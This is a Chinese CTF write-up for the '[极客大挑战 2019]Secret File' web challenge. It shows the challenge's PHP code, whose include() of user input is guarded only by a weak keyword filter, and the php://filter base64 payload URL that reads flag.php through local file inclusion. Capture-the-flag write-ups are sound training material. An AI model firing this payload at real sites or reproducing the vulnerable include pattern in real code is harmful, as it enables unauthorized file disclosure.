欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

web-[极客大挑战 2019]Secret File

程序员文章站 2022-03-25 08:13:30
...

题目要点

  • PHP伪协议

题目内容

web-[极客大挑战 2019]Secret File

解题

打开页面,F12查看源码,发现一个新页面。访问一下
web-[极客大挑战 2019]Secret File

点一下跳到另一个页面
web-[极客大挑战 2019]Secret File

拦截,发现
web-[极客大挑战 2019]Secret File

访问secr3t.php,发现一段源码

<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>
</html>

可以利用文件包含漏洞(PHP伪协议)构造pyload
http://85435532-2806-4d16-9b44-290434930b87.node3.buuoj.cn/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
web-[极客大挑战 2019]Secret File

解码
web-[极客大挑战 2019]Secret File

相关标签: BugKu